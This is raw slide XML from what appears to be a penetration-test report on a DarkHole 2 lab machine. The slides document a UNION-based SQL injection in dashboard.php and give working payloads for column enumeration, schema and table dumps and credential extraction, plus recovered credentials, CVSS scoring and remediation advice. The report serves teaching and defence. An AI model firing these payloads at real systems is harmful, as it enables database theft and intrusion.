            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>='darkhole_2'-- -  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Extracted table ssh.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Steal Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=' UNION SELECT 1,user,pass,4,5,6 FROM ssh-- - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Retrieved credentials: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AF6F4E9-5428-DB8F-0FB9-CD51FB3D7ACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7429497" y="476140"/>
            <a:ext cx="4269037" cy="2309101"/>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FFDAB11D-CCFF-862C-56CE-33AD115DE985}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7429497" y="3207441"/>
            <a:ext cx="4269037" cy="2510188"/>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675005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0C3D0-7C46-6016-386E-37B536FA0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E4C08-B6E3-EF0D-A183-92FDCFCD99C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>Cont..	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC6A4EA-EC18-E6F0-A693-3CE9982E37B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="7166113" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Found id parameter vulnerable to error-based SQLi </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leveraged UNION SELECT to dump database contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php?id='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Confirm vulnerability via error (500 response)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Enumerate columns: GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>=' ORDER BY 6-- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Dump data: GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>=' UNION SELECT 1,database(),3,4,5,6-- - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Immediate: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Full database access (e.g., darkhole_2).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Secondary: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Credential theft → SSH access → RCE → Root compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056C0AE3-6247-2D36-BCA3-22DA7A51C455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7584172" y="302819"/>
            <a:ext cx="4075995" cy="2189665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAF06FB3-1B7C-D68B-BB1B-69B2A722A9F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7424530" y="2743880"/>
            <a:ext cx="4395281" cy="586122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E887B1A-E110-FDAF-B767-56779560A450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7584172" y="3599654"/>
            <a:ext cx="4075996" cy="2302894"/>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158076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7A003-C6FD-84E2-89EF-B879E17922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01F3AA-F395-64E4-8DC2-6716E6B07796}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>Database Schema Enumeration via SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83EC837D-C403-F528-48F8-1A6A148D3E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Database Schema Enumeration via SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>page was vulnerable to UNION-based SQL injection through the id parameter, Allows to enumerate the database schema, extract table structures, and retrieve sensitive data (e.g., credentials from the ssh table).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Parameter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>id (e.g., id=' UNION SELECT 1,2,3,4,5,6-- -).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>because it allows remotely to extract all database data (credentials, schemas) and execute arbitrary SQL commands, leading to full system compromise. The attack requires low complexity (simple payloads) and impacts confidentiality, integrity, AND availability </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Risk/Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Data Exposure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Extracted database schemas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>tables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>(darkhole_2.ssh), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>and columns.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Credential Theft: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Retrieved plaintext credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>from the ssh table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>System Compromise: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Enabled SSH access → RCE → Privilege escalation to root.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1944234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459D7-33B4-0F5E-06EE-D33A9D697B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820D4C-FEFE-0FB1-8EEC-DA3E55DFFB61}"/>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1EEA9916-C7A7-AC6B-0079-6B68777514B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Prepared statements separate SQL logic from user input, preventing injection by automatically escaping malicious payloads (e.g., $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-&gt;execute([$_GET['id']]) instead of raw SQL concatenation).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Disable Error Messages: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Configure PHP/MySQL to hide detailed errors (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>display_errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = Off).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>WAF Rules: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Block SQL keywords (e.g., UNION, SELECT) in input parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score: 8.8 (High)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>References:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/SQL_Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cwe.mitre.org/data/definitions/89.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Enumerate Columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=' ORDER BY 6-- -  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Determined 6 columns).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Extract Schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>=' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>(Listed databases)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Dump Tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
